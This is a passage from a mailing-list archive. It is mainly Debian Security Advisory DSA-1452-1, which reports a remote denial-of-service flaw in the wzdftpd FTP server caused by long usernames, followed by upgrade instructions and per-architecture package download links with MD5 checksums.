For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHgRfvXm3vHE4uyloRAhe+AKDIw1jytyTS6RLm1LHnshpb4yAFnwCgik/R
tTp8JPvGlduXnc8XbE/BNps=
=tSmN
-----END PGP SIGNATURE-----



From skx at debian.org  Sun Jan  6 20:29:28 2008
From: skx at debian.org (Steve Kemp)
Date: Sun, 6 Jan 2008 20:29:28 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1452-1] New wzdftpd packages fix
	denial of service
Message-ID: <20080106202928.GA7776@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1452-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
January 06, 2008                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : wzdftpd
Vulnerability  : denial of service
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-5300
Debian Bug     : 446192

"k1tk4t" discovered that wzdftpd, a portable, modular, small and efficient
ftp server, did not correctly handle the receipt of long usernames.  This
could allow remote users to cause the daemon to exit.

For the stable distribution (etch), this problem has been fixed in version
0.8.1-2etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 0.5.2-1.1sarge3.

For the unstable distribution (sid), this problem has been fixed in version
0.8.2-2.1.

We recommend that you upgrade your wzdftpd package.


Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 3.1 alias sarge
- ---------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2.orig.tar.gz
    Size/MD5 checksum:   818860 62a4af39801fe581f85cd063c5fc4717
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3.dsc
    Size/MD5 checksum:      769 56ce84eafc6683eae084c1edbe5a4567
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3.diff.gz
    Size/MD5 checksum:     8531 80784497bc6ccee3adc676584fe1df75

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_alpha.deb
    Size/MD5 checksum:   294374 3b7e0d4266cdc03f93c1b3734f606287
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_alpha.deb
    Size/MD5 checksum:    49304 c1c1978ecd2b95b805e207e3a245682f
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_alpha.deb
    Size/MD5 checksum:    30788 dd38408c8485348f8bc8164958a04860
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_alpha.deb
    Size/MD5 checksum:   312336 6cb966eb16081a8d5ee88cd77d5ed95c
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_alpha.deb
    Size/MD5 checksum:    31594 2adefb9d0050b4f98d862271bb1f81a3

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_amd64.deb
    Size/MD5 checksum:    47248 f8b780ddb9256ef41b7ea0a8c7e23001
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_amd64.deb
    Size/MD5 checksum:   217964 6de9a4f433f49c2fcbf98b4e445ad793
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_amd64.deb
    Size/MD5 checksum:   286510 0814035329e48155cb473be2b0dd3568
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_amd64.deb
    Size/MD5 checksum:    30964 54692932158750e896d11eda8cda4d2d
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_amd64.deb
    Size/MD5 checksum:    30066 c1bf50b51cfc2e6c2ffb9a98d4d66ee9

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_arm.deb
    Size/MD5 checksum:    29288 e9833e4f4693378b7c989d3540d8ca25
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_arm.deb
    Size/MD5 checksum:   214440 53f72f4bfa1df22bade8f46b4666a2a9
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_arm.deb
    Size/MD5 checksum:    29590 7af9d441be7afc5584783869e7b4ad67
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_arm.deb
    Size/MD5 checksum:    45970 dec5a70db33cdc64bfd4354a9b4dedb3
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_arm.deb
    Size/MD5 checksum:   264860 0a452abd94a4f4f94449bd297bbe93fc

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_hppa.deb
    Size/MD5 checksum:    31272 21683dbdfe11b648f69eeb66b8d1efba
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_hppa.deb
    Size/MD5 checksum:   241864 71474662edd00e4bb55c585ea62883a6
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_hppa.deb
    Size/MD5 checksum:   304622 e9e035c813888e34953bec2512f4d445
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_hppa.deb
    Size/MD5 checksum:    49386 424159100a537a5193df8dd59fde33fe
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_hppa.deb
    Size/MD5 checksum:    31826 099abdd5060b4b86922665aacce5780a

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_i386.deb
    Size/MD5 checksum:   271748 d86c9195911c09a5cefc98054995f7e2
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_i386.deb
    Size/MD5 checksum:   202724 3c30c4b8324a67d8ea78a812d701f352
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_i386.deb
    Size/MD5 checksum:    29452 0e52276341af49cfa0bebdade9c82caf
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_i386.deb
    Size/MD5 checksum:    30382 ec1b766825c7b73c6ad2f34e02dfb778
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_i386.deb
    Size/MD5 checksum:    46648 552513b83992c1912c52037c2d5d1820

m68k architecture (Motorola Mc680x0)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_m68k.deb
    Size/MD5 checksum:   184892 c211f43c1332786c6a6a4ae822598985
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_m68k.deb
    Size/MD5 checksum:    30246 8de2bd0389435283927e5286e627d10e
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_m68k.deb
    Size/MD5 checksum:    29152 8b8bf9d9a50d81d5547e6c209cf72aa9
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_m68k.deb
    Size/MD5 checksum:   262862 581e9f7974f8a876730e1c7bec7174a6
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_m68k.deb
    Size/MD5 checksum:    45346 b4ba8493f6d9f000517299b339e87021

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_mips.deb
    Size/MD5 checksum:    28900 0969c35a9efe9960df3933b79542126a
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_mips.deb
    Size/MD5 checksum:    29746 9e63566dd12845c74d5c5e3cba4488f6
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_mips.deb
    Size/MD5 checksum:    42310 45044c204cabec92529f22bfa3182beb
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_mips.deb
    Size/MD5 checksum:   277160 52efb0e34a8a4efea40da410e146040a
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_mips.deb
    Size/MD5 checksum:   229224 9c67c455d8959f81a0b978ac92e05074

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_mipsel.deb
    Size/MD5 checksum:    29714 8dd2707a21e434d225379ce1f1b0a0f7
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_mipsel.deb
    Size/MD5 checksum:    28928 f43cbb789bff9268764f5fb9e3a2cc17
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_mipsel.deb
    Size/MD5 checksum:    42194 53b5f7e6eff691afaf62dfd76c865bad
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_mipsel.deb
    Size/MD5 checksum:   229030 51106351fd524b05ae9de559b5172872
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_mipsel.deb
    Size/MD5 checksum:   277218 59548ada140407ce5b616ccc7bba466b

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_powerpc.deb
    Size/MD5 checksum:   288294 0e86e9d7ef432e12e5625737ed42a148
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_powerpc.deb
    Size/MD5 checksum:    48668 343a5388aecc0d6243aa52efa6feca49
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_powerpc.deb
    Size/MD5 checksum:    31860 3c962d7766f74ee131581ccd9764c386
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_powerpc.deb
    Size/MD5 checksum:   226588 ab00e6665c2341ec522b4db1a0e233d0
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_powerpc.deb
    Size/MD5 checksum:    29888 d45adf3b806c8fcd8f2aaaac81d0d0ee

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_s390.deb
    Size/MD5 checksum:    29824 9c82fae034d6d16db19ce33fbdb7c1bd
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_s390.deb
    Size/MD5 checksum:   217196 4a1c756f3c45218985bea2f9743dbc6f
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_s390.deb
    Size/MD5 checksum:    43930 6a6beb9127b537fe7b7148bf93d3d6d1
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_s390.deb
    Size/MD5 checksum:    31160 1dafc87562ed86f167e7b3ffbdafd960
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_s390.deb
    Size/MD5 checksum:   291876 660de49243389d08b3cb8e86d0398133

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_sparc.deb
    Size/MD5 checksum:   209916 b512248596cf3a7054df856421c7b734
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_sparc.deb
    Size/MD5 checksum:   273600 fba7f4ea9f353f2bdfad8da829814be3
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_sparc.deb
    Size/MD5 checksum:    45660 fc227e45bba942bbed4b3b4369c406da
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_sparc.deb
    Size/MD5 checksum:    29898 2bb5ab423dbb7852e78c4c56022f3816
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_sparc.deb
    Size/MD5 checksum:    29412 afa46a500de81f1b184ce39daeb8c021

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1.orig.tar.gz
    Size/MD5 checksum:   916176 adc0b6ec5b373d0ae9bcb79947dcdc34
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1.diff.gz
    Size/MD5 checksum:    12393 32c647651b80a26a3bb933c1abeb0c3b
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1.dsc
    Size/MD5 checksum:      863 68399e61898a27e00c5b79eb77c5eada

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_alpha.deb
    Size/MD5 checksum:    40494 1a24709abc401cfe37d726cded925447
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_alpha.deb
    Size/MD5 checksum:    36358 a432ae566f136f0b86065b4887076d31
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_alpha.deb
    Size/MD5 checksum:    40808 afa42a410b2fa5699d518b2d82f78f2a
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_alpha.deb
    Size/MD5 checksum:    31564 dcdba5a39c277a2417f467a46d359770
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_alpha.deb
    Size/MD5 checksum:   378302 1d5ae790c2e20c634401aa1188964399
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_alpha.deb
    Size/MD5 checksum:   303928 adb2c9b3f731a7af9275bf1b05c92f4f
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_alpha.deb
    Size/MD5 checksum:    54244 5f3ecb820e29c2f3a7d6596ee44ef766

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_amd64.deb
    Size/MD5 checksum:    39826 cbc6a520327457f192f3eded392afeb9
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_amd64.deb
    Size/MD5 checksum:   278392 5bf9cfaa598905ab383990ce9a2ddc39
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_amd64.deb
    Size/MD5 checksum:    39822 06dfab32ac91ded8d0463f86a3045783
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_amd64.deb
    Size/MD5 checksum:    52210 39f3285c116621c727cb035b3daf2146
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_amd64.deb
    Size/MD5 checksum:   279426 73d4840f06b1d3c1510b25cb2af0cd76
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_amd64.deb
    Size/MD5 checksum:    31128 bac87204e158dee6a887f11756f3bed5
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_amd64.deb
    Size/MD5 checksum:    35712 f65e8c48948c8bf07a7f931c0f5eab80

arm architecture (ARM)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_arm.deb
    Size/MD5 checksum:   252038 884d79624db24c8a781d0aa0ea6c9262
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_arm.deb
    Size/MD5 checksum:    34426 82f6f5b38fe51e00acef11bffdfefe61
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_arm.deb
    Size/MD5 checksum:    38492 7f2ab5920dc9b95b8ad7ba864918ab59
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_arm.deb
    Size/MD5 checksum:   252672 6b14994ae6595934737a5ee3509c31d8
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_arm.deb
    Size/MD5 checksum:    30490 1c88463e827ccd1cb65b9b0712b2d3e1
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_arm.deb
    Size/MD5 checksum:    50928 102aab74ff362fd9638ebcba9b674734
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_arm.deb
    Size/MD5 checksum:    38524 91a93c8950f3871ce60f8286d4426187

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_hppa.deb
    Size/MD5 checksum:    36966 53509f79ef24ba1bc60bef125a6de19e
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_hppa.deb
    Size/MD5 checksum:    31908 b07282752f3680e7eff678e16ead8957
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_hppa.deb
    Size/MD5 checksum:    54630 d5c3f56299b0a2d9c215e7e52e78635d
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_hppa.deb
    Size/MD5 checksum:   295266 cd40d190e0fcbdfd83d2f028f6ae643d
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_hppa.deb
    Size/MD5 checksum:    41212 efe9dd77f99cf70c461c0113967ed365
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_hppa.deb
    Size/MD5 checksum:    41300 234aa07522ce228c7182531f78385aa4
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_hppa.deb
    Size/MD5 checksum:   309492 cccbcf2ee08777e4bd6571e76587fdfd

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_i386.deb
    Size/MD5 checksum:   255404 461bfb0f5ea1d4395662d759d6fc8e01
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_i386.deb
    Size/MD5 checksum:   258984 4a9e2a8bb840497e49e067247beff4a6
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_i386.deb
    Size/MD5 checksum:    51974 cfe147b51da8533a652593ac7095f906
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_i386.deb
    Size/MD5 checksum:    39746 f4674503b34fc02517e3291718c25d78
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_i386.deb
    Size/MD5 checksum:    35228 6d7b3d899bbae284744de1aba20dca40
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_i386.deb
    Size/MD5 checksum:    31010 0a1c9f4eeee4aac5a6a319edc5ff5d41
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_i386.deb
    Size/MD5 checksum:    39382 1bf0337e5d353f7395c2e908ee66df43

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_ia64.deb
    Size/MD5 checksum:    39040 37a37ecb40c3dadc293056e0799e9d4f
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_ia64.deb
    Size/MD5 checksum:    61412 f17cfd857ccd2afa1c2d0b4fd4f767d5
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_ia64.deb
    Size/MD5 checksum:    44160 7e153fcb4680448dd571eb7cbaadd887
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_ia64.deb
    Size/MD5 checksum:    44968 43d60788c754002cc2b049cee9a441ec
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_ia64.deb
    Size/MD5 checksum:   362516 847cd633e2538ea41d839a47d650aa89
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_ia64.deb
    Size/MD5 checksum:    33134 8cf70d2c39636f901c8c48f94170615a
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_ia64.deb
    Size/MD5 checksum:   373030 d111155fd83c28e0ad88b11e3b2a41e2

mips architecture (MIPS (Big Endian))

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_mips.deb
    Size/MD5 checksum:    39120 5b9de0d1c6632fb697b203dbb5ef23e1
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_mips.deb
    Size/MD5 checksum:    47114 3a817ee42402f07e9125df0977ab4232
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_mips.deb
    Size/MD5 checksum:    30896 a62a63fb1f869d7bec180f70ef883ba0
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_mips.deb
    Size/MD5 checksum:    38760 6fb8399ae406dfe25c86a568702a2fad
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_mips.deb
    Size/MD5 checksum:   306682 44ff34cc0e9ed4f434eaa2de5188671e
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_mips.deb
    Size/MD5 checksum:    35092 b3659e67df4d397ded808540adcc1eab
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_mips.deb
    Size/MD5 checksum:   260088 7bb2ac3601c107563e83dde6afa77173

mipsel architecture (MIPS (Little Endian))

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_mipsel.deb
    Size/MD5 checksum:   305494 b72940a7d1dcb61d07319abbb5a80a9c
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_mipsel.deb
    Size/MD5 checksum:    38808 10c9266904fe911576fa64d4a8b62e62
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_mipsel.deb
    Size/MD5 checksum:    35116 e1c1cb14203a5d39378f9fbaae601acd
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_mipsel.deb
    Size/MD5 checksum:   260466 8530e7d26e983090d603101dd741573b
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_mipsel.deb
    Size/MD5 checksum:    39088 50b370cc052b2f6225553055429ad9dd
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_mipsel.deb
    Size/MD5 checksum:    47052 b525864b56e256d141b67bafb43ebe6f
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_mipsel.deb
    Size/MD5 checksum:    30876 c43bb383ef961cdd61f007324204c9a8

powerpc architecture (PowerPC)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_powerpc.deb
    Size/MD5 checksum:    36800 01c52ecf901292169828f68fc79128b3
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_powerpc.deb
    Size/MD5 checksum:   287198 a8d45cf4b6d94565cc23d158470c38bd
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_powerpc.deb
    Size/MD5 checksum:    32596 a9a9f2c76e923e19812bbf2c74e94a2a
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_powerpc.deb
    Size/MD5 checksum:    39748 63b0f8e69bdba8e8ff807eac51ef5178
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_powerpc.deb
    Size/MD5 checksum:    53546 2a8014961fd5864364e74833a2056edc
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_powerpc.deb
    Size/MD5 checksum:   278250 7b5e08e67cf971d43e3ef61be3519c75
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_powerpc.deb
    Size/MD5 checksum:    39786 c424e3d68756e982865edc4f0d3cb725

s390 architecture (IBM S/390)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_s390.deb
    Size/MD5 checksum:    39666 0fa9273498d4b831b4f8b943f825d360
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_s390.deb
    Size/MD5 checksum:    36014 bfae60cd99fed4a17fd9b2c49be6cb85
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_s390.deb
    Size/MD5 checksum:    39534 3dfe1d78d520e789cb18792c52df5d2e
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_s390.deb
    Size/MD5 checksum:   283726 b4398f379ff2680b89a64dfb79731d83
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_s390.deb
    Size/MD5 checksum:   276306 47889561858e88b369d01f07f554f605
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_s390.deb
    Size/MD5 checksum:    31422 b9eb5b0808e411404680668257986843
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_s390.deb
    Size/MD5 checksum:    49818 981f371cbe62f9e476da990cc2fe84d5

sparc architecture (Sun SPARC/UltraSPARC)

  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_sparc.deb
    Size/MD5 checksum:    39044 95fd1adf43451c3bbd00820180a5b66e
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_sparc.deb
    Size/MD5 checksum:    34856 408a1e5737e95de2b63b95588b08133b
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_sparc.deb
    Size/MD5 checksum:   262888 13dd43e1ab04086306c5910996a47499
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_sparc.deb
    Size/MD5 checksum:   258762 47627fb1f6168d04b8cf97fd107782b9
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_sparc.deb
    Size/MD5 checksum:    39090 e72f0b8f0cdf770ce6d7d64c2b37eca0
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_sparc.deb
    Size/MD5 checksum:    30762 0f8e9285c5c3f3d11529123d5fca6490
  http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_sparc.deb
    Size/MD5 checksum:    50522 074fb8e8054184996c332d4e0d29f75d


  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHgTnrwM/Gs81MDZ0RAoJSAJ0Q8+C7DXjvB9Vm03nLvxH0BlyjEgCfZspE
RprWcscz9zVkuelju2rj9r0=
=jJpe
-----END PGP SIGNATURE-----



From b9u4ea at gmail.com  Mon Jan  7 17:37:30 2008
From: b9u4ea at gmail.com (b9u4ea)
Date: Mon, 7 Jan 2008 11:37:30 -0600
Subject: [Full-disclosure] scada/plc gear
In-Reply-To: <477FD403.4060605@rogers.com>
